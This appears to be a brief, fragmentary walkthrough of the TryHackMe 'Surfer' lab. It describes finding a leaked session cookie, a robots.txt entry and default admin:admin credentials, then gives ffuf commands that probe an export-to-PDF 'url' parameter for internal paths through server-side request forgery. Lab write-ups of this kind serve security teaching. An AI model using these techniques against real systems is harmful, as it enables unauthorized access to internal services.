Surfer TryHackMe walkthrough

introduction

  1. SSH (secure shell) used to access the server but requires valid credentials
  2. HTTP (Probably a web application running)
  1. Server is running PHP though the PHPSESSID leaked
  2. There was robots.txt present.
/backup/chat.txt
  1. Admin
  2. Kate
admin:admin
ffuf -u http://10.10.74.235/export2pdf.php -d "url=http://127.0.0.1/FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: PHPSESSID=2905206e024706693b9b970155055af4" -w ~/Desktop/git/SecLists/Discovery/Web-Content/raf
t-small-words.txt -e .txt,.php -fw 354

-u specifies the HOST url
-d specifies the POST parameters to use
-H represent the headers to use while running the requests
-w specifies the wordlists to use
-e specifies the extensions to include
-fw specifies the number of words to use as a filter
ffuf -u http://10.10.74.235/export2pdf.php -d "url=http://127.0.0.1/internal/FUZZ" -H "Content-Type: application/x-www-form-urlencoded" -H "Cookie: PHPSESSID=2905206e024706693b9b970155055af4" -w ~/Desktop/git/SecLists/Discovery/Web-Co
ntent/raft-small-words.txt -e .txt,.php -fw 354

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store